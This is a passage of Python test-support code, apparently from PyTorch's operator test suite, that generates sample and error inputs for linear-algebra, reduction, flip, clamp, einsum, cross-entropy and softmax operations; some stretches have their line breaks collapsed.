1: A = make_arg((n, n)) if left else make_arg((k, k)) B = make_arg((n, k)) else: A = make_arg((b, n, n)) if left else make_arg((b, k, k)) B = make_arg((b, n, k)) if uni: # Not really necessary, but writing it for consistency A.diagonal(0, -2, -1).fill_(1.) else: d = A.diagonal(0, -2, -1) d[d.abs() < 1e-6] = 1. 
        if upper:
            A.triu_()
        else:
            A.tril_()
        kwargs = {"upper": upper, "left": left, "unitriangular": uni}
        if requires_grad:
            for grad_A, grad_B in product((True, False), repeat=2):
                # Either A or B needs to have a gradient
                if not grad_A and not grad_B:
                    continue
                yield SampleInput(
                    A.clone().requires_grad_(grad_A),
                    args=(B.clone().requires_grad_(grad_B),),
                    kwargs=kwargs)
        else:
            yield SampleInput(A, args=(B,), kwargs=kwargs)

def sample_inputs_legacy_solve(op_info, device, dtype, requires_grad=False, **kwargs):
    """
    This function always generates solvable input for legacy solve functions
    (the ones that are not in the torch.linalg module).
    The difference from sample_inputs_linalg_solve is that here the right-hand-side of the A x = b equation
    should have b.ndim >= 2; vectors are not allowed.
    Also the arguments order is swapped.
    """
    out = sample_inputs_linalg_solve(
        op_info, device, dtype, requires_grad=requires_grad, vector_rhs_allowed=False
    )

    # Reverses tensor order
    for sample in out:
        sample.input, sample.args = sample.args[0], (sample.input,)
        yield sample

def sample_inputs_cholesky_solve(op_info, device, dtype, requires_grad=False, **kwargs):
    cholesky_inverse_samples = sample_inputs_linalg_cholesky_inverse(
        op_info, device, dtype, requires_grad=False
    )

    for sample in cholesky_inverse_samples:
        psd_matrix = sample.input
        sample.input = make_tensor(psd_matrix.shape, dtype=dtype, device=device,
                                   requires_grad=requires_grad, low=None, high=None)
        sample.args = (psd_matrix.requires_grad_(requires_grad),)
        yield sample

def sample_inputs_lu(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_fullrank_matrices_with_distinct_singular_values,
                       dtype=dtype, device=device, requires_grad=requires_grad)

    # not needed once OpInfo tests support Iterables
    batch_shapes = ((), (3,), (3, 3))
    for batch_shape, get_infos, size_delta in product(batch_shapes, (True, False), (-2, -1, 0, +1, +2)):
        shape = batch_shape + (S + size_delta, S)
        input = make_arg(*shape)
        yield SampleInput(input, args=(True, get_infos))

def sample_inputs_linalg_lu(op_info, device, dtype, requires_grad=False, **kwargs):
    full_rank = (op_info.name == "linalg.lu_factor")
    make_fn = make_tensor if not full_rank else make_fullrank_matrices_with_distinct_singular_values
    make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad)

    def out_fn(output):
        if op_info.name in ("linalg.lu",):
            return output[1], output[2]
        else:
            return output

    batch_shapes = ((), (3,), (3, 3))
    # pivot=False only supported in CUDA
    pivots = (True, False) if torch.device(device).type == "cuda" else (True,)
    deltas = (-2, -1, 0, +1, +2)
    for batch_shape, pivot, delta in product(batch_shapes, pivots, deltas):
        shape = batch_shape + (S + delta, S)
        # Insanely annoying that make_fullrank_blablabla accepts a *shape and not a tuple!
        A = make_arg(shape) if not full_rank else make_arg(*shape)
        yield SampleInput(A, kwargs={"pivot": pivot}, output_process_fn_grad=out_fn)

def sample_inputs_lu_solve(op_info, device, dtype, requires_grad=False, **kwargs):
    make_fn = make_fullrank_matrices_with_distinct_singular_values
    make_a = partial(make_fn, dtype=dtype, device=device)
    make_b = partial(make_tensor, dtype=dtype, device=device)

    batches = ((), (0, ), (2, ))
    ns = (5, 3, 0)
    nrhs = (0, 1, 6)

    for n, batch, rhs in product(ns, batches, nrhs):
        shape_a = batch + (n, n)
        a = make_a(*shape_a)
        lu, pivs = a.lu()
        lu = lu.contiguous()

        shape_b = batch + (n, rhs)
        b = make_b(shape_b)

        grads = (False,) if not requires_grad else (True, False)
        # we try all possible combinations of requires_grad for each input
        for lu_grad, b_grad in product(grads, grads):
            # when requires_grad == True, at least one input has to have requires_grad enabled
            if requires_grad and not lu_grad and not b_grad:
                continue

            lu_ = lu.clone()
            lu_.requires_grad_(lu_grad)
            b_ = b.clone()
            b_.requires_grad_(b_grad)
            yield SampleInput(b_, args=(lu_, pivs))

def sample_inputs_lu_unpack(op_info, device, dtype, requires_grad=False, **kwargs):
    def out_fn(output):
        return output[1], output[2]

    for lu_sample in sample_inputs_linalg_lu(op_info, device, dtype, requires_grad, **kwargs):
        lu_data, pivots = torch.linalg.lu_factor(lu_sample.input)
        lu_data.requires_grad_(requires_grad)
        yield SampleInput(lu_data, args=(pivots,), output_process_fn_grad=out_fn)

def sample_inputs_roll(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    args = ((0, 0), (1, 2), (0, 2), (2, 0), (-1, 0), (10000, 1), (2,), ((1, 2, -1), (0, 1, 2)))

    for arg in args:
        yield SampleInput(make_arg((0, 0, 0)), args=arg)
        yield SampleInput(make_arg((S, S, S)), args=arg)

def error_inputs_roll(op_info, device, **kwargs):
    err_msg1 = "`shifts` required"
    s1 = SampleInput(
        make_tensor((S,), dtype=torch.float32, device=device), args=(tuple(),)
    )
    yield ErrorInput(s1, error_regex=err_msg1)

    err_msg2 = ("shifts and dimensions must align")
    s2 = SampleInput(
        make_tensor((S, S), dtype=torch.float32, device=device), args=((2, 1), 0)
    )
    yield ErrorInput(s2, error_regex=err_msg2)

    err_msg3 = ("out of range")
    s3 = SampleInput(
        make_tensor((S, ), dtype=torch.float32, device=device), args=(0, 2)
    )
    yield ErrorInput(s3, error_regex=err_msg3, error_type=IndexError)

def sample_inputs_rot90(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    args = itertools.product(range(-5, 6), [(0, 1), (1, 2), (1, -1)])

    yield SampleInput(make_arg((S, S, S)))
    for arg in args:
        yield SampleInput(make_arg((S, S, S)), args=arg)

def error_inputs_rot90(op_info, device, **kwargs):
    err_msg1 = "expected total rotation dims"
    s1 = SampleInput(
        make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (0,)}
    )
    yield ErrorInput(s1, error_regex=err_msg1)

    err_msg2 = "expected total dims >= 2"
    s2 = SampleInput(
        make_tensor((S,), dtype=torch.float32, device=device),
    )
    yield ErrorInput(s2, error_regex=err_msg2)

    err_msg3 = "expected rotation dims to be different"
    s3 = SampleInput(
        make_tensor((S, S), dtype=torch.float32, device=device), kwargs={"dims": (1, 1)}
    )
    yield ErrorInput(s3, error_regex=err_msg3)

def sample_inputs_std_var(op_info, device, dtype, requires_grad, **kwargs):
    tensor_nd = partial(make_tensor, (S, S, S), device=device, dtype=dtype,
                        requires_grad=requires_grad)
partial(make_tensor, (S,), device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(tensor_nd()), SampleInput(tensor_nd(), kwargs=dict(dim=1)), SampleInput(tensor_nd(), kwargs=dict(dim=1, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=True, keepdim=True)), SampleInput(tensor_1d(), kwargs=dict(dim=0, unbiased=False, keepdim=False)), SampleInput(tensor_nd(), kwargs=dict(dim=(1,), correction=S // 2)), SampleInput(tensor_nd(), kwargs=dict(dim=None, correction=0, keepdim=True)), ] def _generate_correlation_inputs(device, dtype, requires_grad, **kwargs): shapes = [(2,), (1, 2), (3, 2), (2, 3)] for shape in shapes: yield make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) def sample_inputs_corrcoef(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(t) for t in _generate_correlation_inputs(device, dtype, requires_grad)] def sample_inputs_cov(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_correlation_inputs(device, dtype, requires_grad): inputs.append(SampleInput(t)) num_observations = t.numel() if t.ndimension() < 2 else t.size(1) fweights = make_tensor((num_observations,), dtype=torch.int, device=device, low=1, high=10) aweights = make_tensor((num_observations,), dtype=torch.float, device=device, low=0, high=1, requires_grad=requires_grad) for correction, fw, aw in product(range(num_observations), [None, fweights], [None, aweights]): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs={'correction': correction, 'fweights': fw, 'aweights': aw})) return inputs def error_inputs_cov(op_info, device, **kwargs): a = torch.rand(S, device=device) error_inputs = [] error_inputs.append(ErrorInput( SampleInput(torch.rand(S, S, S, device=device)), error_regex="expected input to have two or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, S, device=device)}), error_regex="expected fweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(S, S, device=device)}), error_regex="expected aweights to have one or fewer dimensions")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.rand(S, device=device)}), error_regex="expected fweights to have integral dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([1, 1], device=device)}), error_regex="expected aweights to have floating point dtype")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([1], device=device)}), error_regex="expected fweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.rand(1, device=device)}), error_regex="expected aweights to have the same numel")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'fweights': torch.tensor([-1, -2, -3, -4 , -5], device=device)}), error_regex="fweights cannot be negative")) error_inputs.append(ErrorInput( SampleInput(a, kwargs={'aweights': torch.tensor([-1., -2., -3., -4., -5.], device=device)}), error_regex="aweights cannot be negative")) return error_inputs def sample_inputs_svd(op_info, device, dtype, requires_grad=False, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) is_linalg_svd = (op_info.name == "linalg.svd") batches = [(), (0, ), (3, )] ns = [0, 3, 5] def 
uniformize(usv):
        S = usv[1]
        k = S.shape[-1]
        U = usv[0][..., :k]
        Vh = usv[2] if is_linalg_svd else usv[2].mH
        Vh = Vh[..., :k, :]
        return U, S, Vh

    def fn_U(usv):
        U, _, _ = uniformize(usv)
        return U.abs()

    def fn_S(usv):
        return uniformize(usv)[1]

    def fn_Vh(usv):
        # We also return S to test
        _, S, Vh = uniformize(usv)
        return S, Vh.abs()

    def fn_UVh(usv):
        U, S, Vh = uniformize(usv)
        return U @ Vh, S

    fns = (fn_U, fn_S, fn_Vh, fn_UVh)

    fullmat = 'full_matrices' if is_linalg_svd else 'some'

    for batch, n, k, fullmat_val, fn in product(batches, ns, ns, (True, False), fns):
        shape = batch + (n, k)
        yield SampleInput(make_arg(*shape), kwargs={fullmat: fullmat_val}, output_process_fn_grad=fn)


def sample_inputs_permute(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    cases = [((1, 2, 3, 4), (0, 2, 3, 1)),
             ((1, 2, 3, 4), (0, -2, -1, 1)),
             ((), ()),
             ((1, 2, 3, 4), (2, 1, 3, 0))]

    for shape, args in cases:
        yield SampleInput(make_arg(shape), args=(args,))


def reference_inputs_permute(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_permute(op, device, dtype, requires_grad, **kwargs)

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases = (
        ((), ()),
        ((1,), (0,)),
        ((2, 2), (1, 0)),
        ((2, 2), (0, 1)),
        ((2, 0, 1), (0, 2, 1)),
        ((3, 4, 2), (2, 1, 0)),
        ((3, 4, 2), (1, 0, 2)),
        ((3, 4, 2), (0, 1, 2)),
    )

    # Adds tricky permutations and permutations with noncontiguity
    for shape, permutation in cases:
        for p in itertools.permutations(permutation):
            a = make_arg(shape).permute(p)
            yield SampleInput(a, args=(permutation,))

            a = make_arg(shape, noncontiguous=True).permute(p)
            yield SampleInput(a, args=(permutation,))


def sample_inputs_linalg_svdvals(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    batches = [(), (0, ), (2, ), (1, 1)]
    ns = [5, 2, 0]

    for batch, m, n in product(batches, ns, ns):
        yield SampleInput(make_arg(batch + (m, n)))


def sample_inputs_softshrink_hardshrink_hardtanh(op_info, device, dtype, requires_grad=False, **kwargs):
    N = 10
    tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype,
               requires_grad=requires_grad)) for _ in range(1, N)]
    return tensors


def sample_inputs_eig(op_info, device, dtype, requires_grad=False, **kwargs):
    eigvecs = make_tensor((S, S), device=device, dtype=dtype,
                          low=None, high=None)
    eigvals = make_tensor((S,), device=device, dtype=dtype,
                          low=None, high=None)
    # we produce only diagonalizable inputs which do not have
    # complex eigenvalues for real inputs, as there is no
    # backward implementation for real inputs with complex
    # eigenvalues yet.
    input = (eigvecs * eigvals.unsqueeze(-2)) @ eigvecs.inverse()
    input.requires_grad_(requires_grad)

    def process_output(eigpair):
        eigvals, eigvecs = eigpair
        if dtype.is_complex:
            # eig produces eigenvectors which are normalized to unit norm.
            # Note that if v is an eigenvector, so is v * e^{i \phi},
            # and |v| = |v * e^{i \phi}| = 1.
            # This, however, makes the eigenvector backward computation process
            # rather unstable unless the objective function is gauge-invariant,
            # that is if f(z) == f(|z|), for example.
            # Hence for complex inputs we ignore the phases and return only
            # the absolute values.
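            # Illustrative sketch of the phase invariance exploited here
            # (comment only, not executed; values are hypothetical):
            #   v = torch.tensor([0.6 + 0.0j, 0.8 + 0.0j])
            #   w = v * cmath.exp(1j * 0.3)       # same eigenvector, rotated phase
            #   torch.allclose(v.abs(), w.abs())  # -> True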
return eigvals, eigvecs.abs() else: return eigvals, eigvecs return [ SampleInput( input, kwargs=dict(eigenvectors=True), output_process_fn_grad=process_output ), ] def sample_inputs_einsum(op_info, device, dtype, requires_grad=False, **kwargs): def c(t): return t.clone().requires_grad_(requires_grad) x = make_tensor((3,), dtype=dtype, device=device, requires_grad=requires_grad) y = make_tensor((4,), dtype=dtype, device=device, requires_grad=requires_grad) A = make_tensor((2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) B = make_tensor((1, 3,), dtype=dtype, device=device, requires_grad=requires_grad) C = make_tensor((1, 2, 3,), dtype=dtype, device=device, requires_grad=requires_grad) D = make_tensor((1, 3, 4,), dtype=dtype, device=device, requires_grad=requires_grad) E = make_tensor((4, 4,), dtype=dtype, device=device, requires_grad=requires_grad) H = make_tensor((3, 3,), dtype=dtype, device=device, requires_grad=requires_grad) I = make_tensor((1, 3, 1,), dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] # Vector operations inputs.append(SampleInput([c(x)], args=('i->',))) # sum inputs.append(SampleInput([c(x), c(y)], args=('i,j->ij',))) # outer # Matrix operations inputs.append(SampleInput([c(A)], args=("ij->i",))) # col sum inputs.append(SampleInput([c(A), c(B)], args=("ij,kj->ik",))) # matmul inputs.append(SampleInput([c(A), c(E)], args=("ij,Ab->ijAb",))) # matrix outer product # Tensor operations inputs.append(SampleInput([c(C), c(D)], args=("aij,ajk->aik",))) # batch matmul inputs.append(SampleInput([c(D), c(E)], args=("aij,jk->aik",))) # tensor matrix contraction inputs.append(SampleInput([c(C), c(B)], args=("ijk,ik->j",))) # non contiguous # Test diagonals inputs.append(SampleInput([c(I)], args=('iji->j',))) # non-contiguous trace # Test ellipsis inputs.append(SampleInput([c(H)], args=("i...->...",))) inputs.append(SampleInput([c(C), c(x)], args=('...ik, ...j -> ij',))) return inputs def sample_inputs_linalg_qr_geqrf(op_info, device, dtype, requires_grad=False, **kwargs): # QR is just well defined when the matrix is full rank make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0,), (2, ), (1, 1)] ns = [5, 2, 0] for batch, (m, n) in product(batches, product(ns, ns)): shape = batch + (m, n) yield SampleInput(make_arg(*shape)) def sample_inputs_flip(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, M, S), (S, 0, M)) all_dims = ((0, 1, 2), (0,), (0, 2), (-1,), ()) for size, dims in product(sizes, all_dims): yield SampleInput(make_arg(size), kwargs={"dims": dims}) def sample_inputs_fliplr_flipud(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((S, 0, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def error_inputs_fliplr(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((1,), dtype=torch.float, device=device)), error_regex="Input must be >= 2-d.") def error_inputs_flipud(op, device, **kwargs): yield ErrorInput(SampleInput(make_tensor((), dtype=torch.float, device=device)), error_regex="Input must be >= 1-d.") # TODO: clamp shares tensors among its sample inputs --- we should prohibit this! 
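# For reference, clamp broadcasts tensor bounds against the input under the
# usual rules, e.g. (illustrative):
#   torch.clamp(torch.tensor([-2., 0., 2.]), min=-1., max=1.)  # -> tensor([-1., 0., 1.])
# which is why the (S, 1, S) lower-bound slice below is a valid min for a
# (S, M, S) input.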
def sample_inputs_clamp(op_info, device, dtype, requires_grad, **kwargs):
    x = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
    lb = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
    ub = make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)

    def detach(tensor):
        return tensor.clone().detach_().requires_grad_(requires_grad)

    return [
        SampleInput(detach(x), args=(lb, ub)),
        SampleInput(detach(x), args=(detach(lb[0]), detach(ub[0]))),
        SampleInput(detach(x), args=(detach(lb[:, :1]),)),
    ]


def reference_inputs_elementwise_ternary(op, device, dtype, requires_grad, *, sample_inputs_func, supports_scalars=False, **kwargs):
    yield from sample_inputs_func(op, device, dtype, requires_grad, **kwargs)

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_scalar_tensor = partial(make_tensor, (), device='cpu', dtype=dtype, requires_grad=requires_grad)
    supported_dtypes = op.supported_dtypes(device)

    # broadcasting and noncontiguous cases
    cases = (
        ((4, 4), (4, 4), (4, 4)),
        ((4, 4), (1, 4, 4), (4, 4)),
        ((4, 4), (1, 4, 4), (4, 1, 4)),
        ((4, 4, 1), (1, 4, 4), (4, 4)),
        ((4, 1), (1, 4, 4), (1, 4)),
        ((4, 4), (), (4, 4)),
        ((4, 4), (), ()),
        ((), (4, 4), (1, 4, 4)),
    )

    for a, b, c in cases:
        yield SampleInput(make_arg(a), args=(make_arg(b), make_arg(c)))
        yield SampleInput(make_arg(a, noncontiguous=True),
                          args=(make_arg(b).transpose(0, -1),
                                make_arg(c, noncontiguous=True).transpose(0, -1)))

    # scalar cases
    if supports_scalars:
        cases = [
            ((), 1, 2,),
            ((), 1., 2),
            ((4, 4), 1., 2,),
            ((3, 4), make_scalar_tensor(), make_scalar_tensor()),
        ]

        if torch.complex64 in supported_dtypes:
            cases.extend([
                ((3, 1, 4), complex(1, 2), 3.),
            ])

        for a, b, c in cases:
            yield SampleInput(make_arg(a), args=(b, c))

    # type promotion cases
    # int x float
    if torch.float in supported_dtypes and torch.long in supported_dtypes:
        a = make_arg((), dtype=torch.long)
        b = make_arg((1, 4), dtype=torch.float)
        c = make_arg((3, 4))

        cases = (
            (a, b, c),
            (c, a, b),
        )

        for a, b, c in cases:
            yield SampleInput(a, args=(b, c))

    # NaN propagation
    if dtype.is_floating_point or dtype.is_complex:
        nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan'))

        a = make_arg((12,))
        a[4] = nan
        a[7] = nan
        b = make_arg((12,))
        b[1] = nan
        b[7] = nan
        c = make_arg((12,))
        c[9] = nan

        yield SampleInput(a, args=(b, c))


def _clamp_numpy(a, min=None, max=None):
    if min is None:
        return np.minimum(a, max)
    if max is None:
        return np.maximum(a, min)

    return np.minimum(max, np.maximum(a, min))


def sample_inputs_clamp_scalar(op_info, device, dtype, requires_grad, **kwargs):
    tensors = (
        make_tensor((2, 3, 2), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((2, 0, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
    )

    if dtype is torch.uint8:
        min_max_vals = ((2, 5), (3, 7))
    else:
        min_max_vals = ((0, 1), (-1, 1))

    output = [SampleInput(
        tensor.clone().requires_grad_(requires_grad),
        args=vals) for tensor, vals in product(tensors, min_max_vals)]
    output += [
        SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(0.5, None)),
        SampleInput(tensors[0].clone().requires_grad_(requires_grad), args=(None, 0.5))]
    empty_tensor = make_tensor((), device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad)
    output.append(SampleInput(empty_tensor, args=(0.0, 1.0)))
    return output


def sample_kwargs_clamp_scalar(device,
dtype, input): if dtype is torch.uint8: min_val, max_val = (random.randint(1, 3), random.randint(4, 8)) elif dtype.is_floating_point: min_val, max_val = (random.uniform(-8, 0), random.uniform(1, 8)) # type: ignore[assignment] else: min_val, max_val = (random.randint(-8, 0), random.randint(1, 8)) return {'min': min_val, 'max': max_val}, {'a_min': min_val, 'a_max': max_val} def sample_inputs_cross(op_info, device, dtype, requires_grad, **kwargs): sample0 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),)) sample1 = SampleInput(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3, S), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': 1}) sample2 = SampleInput(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad), args=(make_tensor((S, 3), device=device, dtype=dtype, requires_grad=requires_grad),), kwargs={'dim': -1}) return (sample0, sample1, sample2) def sample_inputs_cumprod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_zeros(dim_select): assert len(dim_select) == 2 result = make_arg(3 * (S,)) result.narrow(dim_select[0], 0, 1).narrow(dim_select[1], 1, 1).zero_() result.narrow(dim_select[0], 2, 1).narrow(dim_select[1], 3, 1).zero_() result.narrow(dim_select[0], 4, 1).narrow(dim_select[1], 3, 1).zero_() return result for dim in range(3): yield SampleInput(make_arg((S, S, S)), args=(dim,)) # Scalar tensors and empty tensor for size in [(), (1,), (0,)]: yield SampleInput(make_arg(size), args=(0,)) yield SampleInput(prod_zeros([0, 1]), args=(1,)) yield SampleInput(prod_zeros([0, 2]), args=(1,)) yield SampleInput(prod_zeros([1, 2]), args=(1,)) # test dtype kwarg yield SampleInput(prod_zeros([1, 2]), args=(1,), kwargs={'dtype': dtype}) def sample_inputs_view_as_complex(op_info, device, dtype, requires_grad, **kwargs): return [SampleInput(make_tensor((S, 2), dtype=dtype, device=device, requires_grad=requires_grad),)] def sample_inputs_view_as_real(op_info, device, dtype, requires_grad, **kwargs): tensors = ( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad) ) return [SampleInput(tensor) for tensor in tensors] def sample_inputs_prod(op_info, device, dtype, requires_grad, **kwargs): def make_arg(shape): # shrink values to be in the interval [-1, +1] for better precision in gradgradcheck return make_tensor(shape, dtype=dtype, device=device, low=-1, high=+1, requires_grad=requires_grad) def prod_single_zero(): result = make_arg(2 * (S,)) result[0, 1] = 0 return result for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): # only Tensor, ignore other inputs yield SampleInput(sample.input.clone().requires_grad_(requires_grad)) yield sample # Generates samples with keepdim = True for sample in sample_inputs_cumprod(op_info, device, dtype, requires_grad): sample.kwargs['keepdim'] = True yield sample yield SampleInput(prod_single_zero()) yield SampleInput(make_arg((3, 3, 3)), args=(1,)) yield SampleInput(make_arg((3, 3, 3)), args=(1,), kwargs={'keepdim': True}) # test zero scalar tensor zero = make_arg(()) zero.zero_() yield 
SampleInput(zero.clone().requires_grad_(requires_grad))
    yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,))
    yield SampleInput(zero.clone().requires_grad_(requires_grad), args=(0,), kwargs={'keepdim': True})


def error_inputs_neg(op_info, device, **kwargs):
    si = SampleInput(torch.tensor((False, True), device=device))
    msg = ("Negation, the `\\-` operator, on a bool tensor is not supported."
           " If you are trying to invert a mask, use the `\\~` or"
           " `logical_not\\(\\)` operator instead.")
    return (ErrorInput(si, error_regex=msg),)


def sample_inputs_diag(op_info, device, dtype, requires_grad, **kwargs):
    vec_sample = SampleInput(make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))

    tensors = (
        make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((3, 5), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
        make_tensor((5, 3), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
    )

    args = ((), (2,), (-2,), (1,), (2,))

    samples = []
    for tensor, arg in product(tensors, args):
        samples.append(SampleInput(tensor.clone().requires_grad_(requires_grad), args=arg))

    return samples + [vec_sample]


def sample_inputs_diagonal_diag_embed(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # Shapes for 2D Tensors
    shapes_2d = ((M, M), (3, 5), (5, 3))

    # Shapes for 3D Tensors
    shapes_3d = ((M, M, M),)

    kwargs_2d = (dict(), dict(offset=2), dict(offset=-2), dict(offset=1))
    kwargs_3d = (dict(offset=1, dim1=1, dim2=2),
                 dict(offset=2, dim1=0, dim2=1),
                 dict(offset=-2, dim1=0, dim2=1))

    for shape, kwarg in chain(product(shapes_2d, kwargs_2d), product(shapes_3d, kwargs_3d)):
        yield SampleInput(make_arg(shape), kwargs=kwarg)


def sample_inputs_diagonal_scatter(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # Shapes for 2D Tensors
    shapes_2d = ((M, M), (3, 5), (5, 3))

    # Shapes for 3D Tensors
    shapes_3d = ((M, M, M),)

    args_2d = ((), (2,), (-2,), (1,))
    args_3d = ((1, 1, 2), (2, 0, 1), (-2, 0, 1))

    for input_shape, arg in chain(product(shapes_2d, args_2d), product(shapes_3d, args_3d)):
        input_ = make_arg(input_shape)
        # We can programmatically figure out the right shape for src:
        # It should be the same size as input.diagonal(other_args...)
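        # e.g. (illustrative) for a 2D input of shape (M, M) and arg == (2,):
        #   input_.diagonal(2).size() == torch.Size([M - 2])
        # so src must be a vector of length M - 2 for the scatter to fit.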
if not isinstance(arg, tuple): arg_tuple = (arg,) else: arg_tuple = arg src_shape = input_.diagonal(*arg_tuple).size() src = make_arg(src_shape) yield SampleInput(input_, args=(src, *arg_tuple)) def sample_inputs_to_sparse(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((S, S)), args=(), output_process_fn_grad=lambda x: x.to_dense()), SampleInput(make_arg((S, S)), args=(1,), output_process_fn_grad=lambda x: x.to_dense()),) def sample_inputs_cross_entropy(op_info, device, dtype, requires_grad, **kwargs): batch_size, num_classes = shape = (2, 3) reductions = ("mean", "sum", "none") input_shape_and_kwargs: List[Tuple[Tuple[int, ...], Dict[str, Any]]] = [ (shape, dict()), ((*shape, 1), dict()), ((*shape, 1, 2), dict()), ((*shape, 1, 2, 3), dict()), *[(shape, dict(reduction=reduction)) for reduction in reductions], *[ ( shape, dict( weight=make_tensor((num_classes,), device=device, dtype=dtype), reduction=reduction, ), ) for reduction in reductions ], (shape, dict(ignore_index=1)), ] sample_inputs = [] for (input_shape, kwargs), probabilities_target in itertools.product(input_shape_and_kwargs, (False, True)): input = make_tensor(input_shape, device=device, dtype=dtype, requires_grad=requires_grad) if probabilities_target: # ignore_index is not supported for probabilities target if "ignore_index" in kwargs: continue target = make_tensor( input_shape, low=0, high=1, device=device, dtype=dtype, requires_grad=requires_grad, ) else: target = make_tensor( (batch_size, *input_shape[2:]), low=0, high=num_classes, device=device, dtype=torch.long, ) if "ignore_index" in kwargs and torch.all(target == kwargs["ignore_index"]): # make sure at least one item in target is not ignored target[0] = random.sample(set(range(num_classes)) - {kwargs["ignore_index"]}, 1)[0] sample_inputs.append(SampleInput(input, args=(target,), kwargs=kwargs)) return sample_inputs # Used for log_softmax, softmax, softmin def sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [ ((S, ), (0, )), ((S, S), (0, )), ((S, S), (1, )), ((S, S), (-1, )), ((S, M, S), (2, )), ] # PyTorch on XLA throws an error when passed with dim argument for 0d tensor. # See https://github.com/pytorch/xla/issues/3061 for more details. if torch.device(device).type != 'xla': cases.append(((), (0, ))) return [ SampleInput(make_arg(shape), args=dim, kwargs=dict(dtype=torch.float64) if with_dtype else None) for shape, dim in cases ] def sample_inputs_masked_softmax(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): """Sample inputs for masked softmax, log_softmax, and softmin. Masked normalization operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. 
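    For example (illustrative only), a sample for masked softmax may pair an
    input of shape (S, S) with a bool mask of the same shape, or with a
    broadcastable one such as (1, S).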
